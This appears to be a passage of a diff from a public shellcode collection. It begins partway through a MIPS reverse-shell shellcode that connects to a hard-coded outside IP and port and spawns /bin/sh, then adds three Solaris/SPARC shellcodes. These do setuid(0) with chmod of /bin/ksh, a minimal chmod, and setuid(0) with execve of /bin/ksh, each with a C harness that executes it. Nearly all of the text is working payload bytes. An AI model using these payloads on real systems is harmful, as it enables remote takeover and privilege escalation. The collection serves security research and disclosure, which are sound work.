* stack, because on my test device the .data section was not executable.
*
* Based on https://youtu.be/0-_Wtz5L9ZY by Evan Walls at tacnetsol.com.
*/
void main()
{
char sc[] =
// sub technique
"\x24\x0d\xff\xfa" // li $t1, -6
"\x01\xa0\x68\x27" // nor $t1, $zero # 5
// sock = socket(2, 2, 0)
"\x25\xa4\xff\xfd" // addiu $a0, $t1, -3 # 2
"\x25\xa5\xff\xfd" // addiu $a1, $t1, -3 # 2
"\x25\xa6\xff\xfb" // addiu $a2, $t1, -5 # 0
"\x24\x02\x17\x98" // li $v0, 0x1798 # socket (0x1798)
"\x01\x01\x01\x0c" // syscall 0x40404
"\x24\x50\x10\x10" // addiu $s0, $v0, 0x1010 # sock + 0x1010
// xor technique
"\x24\x0e\x21\x21" // li $t2, 0x2121
// connect(sock, {2, 0x5ac2, 0x5db8d822}, 16)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x39\xcc\x21\x23" // xori $t0, $t2, 0x2123 # 2
"\xa7\xac\xff\xec" // sh $t0, -20($sp)
"\x24\x0c\x5a\xc2" // li $t0, 0x5ac2 # 23234 << XXX port
"\xa7\xac\xff\xee" // sh $t0, -18($sp)
"\x24\x0c\x5d\xb8" // li $t0, 0x5db8 # 93.184 << XXX ip1
"\xa7\xac\xff\xf0" // sh $t0, -16($sp)
"\x34\x0c\xd8\x22" // li $t0, 0xd822 # 216.34 << XXX ip2
"\xa7\xac\xff\xf2" // sh $t0, -14($sp)
"\x27\xa5\xff\xec" // addiu $a1, $sp, -20
"\x39\xc6\x21\x31" // xori $a2, $t2, 0x2131 # 16
"\x24\x02\x17\x99" // li $v0, 0x1799 # connect (0x1799)
"\x01\x01\x01\x0c" // .byte 0x01, 0x01, 0x01, 0x0c # syscall
// add overflow technique
"\x24\x0f\x7f\x7f" // li $t3, 0x7f7f
// dup2(sock, 0)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x81" // addiu $a1, $t3, 0x8081 # 0
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 1)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x82" // addiu $a1, $t3, 0x8082 # 1
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 2)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x83" // addiu $a1, $t3, 0x8083 # 2
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// execve("/bin/sh", ["/bin/sh"], 0)
"\x3c\x0c\x2f\x62" // lui $t0, 0x2f62 # "/b"
"\x25\x8c\x69\x6e" // addiu $t0, 0x696e # "in"
"\xaf\xac\xff\xec" // sw $t0, -20($sp)
"\x3c\x0c\x2f\x73" // lui $t0, 0x2f73 # "/s"
"\x25\x8c\x68\x68" // addiu $t0, 0x6868 # "hh"
"\xaf\xac\xff\xf0" // sw $t0, -16($sp)
"\xa3\xa0\xff\xf3" // sb $zero, -13($sp) # NUL
"\x27\xa4\xff\xec" // addiu $a0, $sp, -20
"\xaf\xa4\xff\xf8" // sw $a0, -8($sp)
"\xaf\xa0\xff\xfc" // sw $zero, -4($sp)
"\x27\xa5\xff\xf8" // addiu $a1, $sp, -8
"\x28\x06\xff\xff" // slti $a2, $zero, -1 # 0 (slti technique)
"\x24\x02\x17\xa9" // li $v0, 0x17a9 # execve (0x17a9)
"\x01\x01\x01\x0c"; // syscall 0x40404
void (*f)() = (void *)sc;
f();
}

38
shellcodes/solaris_sparc/50748.c Normal file
View file

@ -0,0 +1,38 @@
/*
* sparc_solaris_chmod.c - Solaris/SPARC chmod() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Solaris/SPARC setuid/chmod/exit shellcode.
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* chmod("/bin/ksh", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc + 12> */
"\x20\xbf\xff\xff" /* bn,a <sc + 16> */
"\x7f\xff\xff\xff" /* call <sc + 20> */
"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* exit(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
void main()
{
void (*f)() = (void *)sc;
f();
}

29
shellcodes/solaris_sparc/50749.c Normal file
View file

@ -0,0 +1,29 @@
/*
* sparc_solaris_chmod2.c - Solaris/SPARC chmod() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Very small Solaris/SPARC chmod shellcode. See also:
* http://phrack.org/issues/70/13.html#article
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
/* chmod("./me", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x20\xbf\xff\xff" /* bn,a <sc + 4> */
"\x7f\xff\xff\xff" /* call <sc + 8> */
"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"./me";
void main()
{
void (*f)() = (void *)sc;
f();
}

35
shellcodes/solaris_sparc/50750.c Normal file
View file

@ -0,0 +1,35 @@
/*
* sparc_solaris_exec.c - Solaris/SPARC execve() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Pretty standard Solaris/SPARC setuid/execve shellcode.
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
void main()
{
void (*f)() = (void *)sc;
f();
}